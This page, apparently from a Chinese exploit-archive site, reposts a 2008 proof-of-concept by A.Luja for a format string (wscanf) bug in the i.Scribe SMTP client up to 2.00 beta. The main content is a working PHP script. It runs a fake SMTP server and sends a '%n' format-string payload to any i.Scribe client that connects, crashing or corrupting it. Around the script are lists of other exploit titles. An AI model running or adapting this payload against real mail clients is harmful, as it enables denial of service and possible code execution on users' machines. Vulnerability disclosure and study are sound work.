首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC
来源:www.vfcocus.net 作者:A.Luja 发布时间:2008-11-28  
<?php
//I dont have c lol
/*___=++++++++++++__=--=________*****
0--
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software
      grTs;SiD.psycho
      A.Luja 27.11.08 

--)(________++++++++++++++++++++---***

___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER[SERVER_ADDR];
$port= 25;
$ret = "AAAA%n%n%n%n%n%n%n%n%n";
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\n");
$bind = socket_bind ($socket, $host, $port) or die ("bind error\n");
$listen = socket_listen($socket,1) or die("listen error\n");
printf("--==Fake smtp server ready==----\n");
printf("Now connect here witch iScribe client\n");
if(($acp=socket_accept($socket))!==false){
    printf("Target connected\n");
    sleep(2);
    printf("send evil char\n");
    $hello=socket_write($acp,$ret,strlen($ret)); 
    printf("done\n");
    socket_close($acp);
}
socket_close($socket);
exit();
?>

//Alfons Luja


 
[推荐] [评论(2条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Star Articles 6.0 Remote Blind
·BaSiC-CMS (acm2000.mdb) Remote
·Basic PHP CMS (index.php id) B
·Microsoft Office Communicator
·Discuz! 6.1 xss2webshell[SODB-
·Booking Centre 2.01 (Auth Bypa
·LoveCMS 1.6.2 Final (Download
·Apache Tomcat runtime.getRunt
·Exploits Total Video Player (v
·Web Calendar System <= 3.40 (X
·Exploits Amaya (id) Remote Sta
·All Club CMS <= 0.0.2 Remote D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved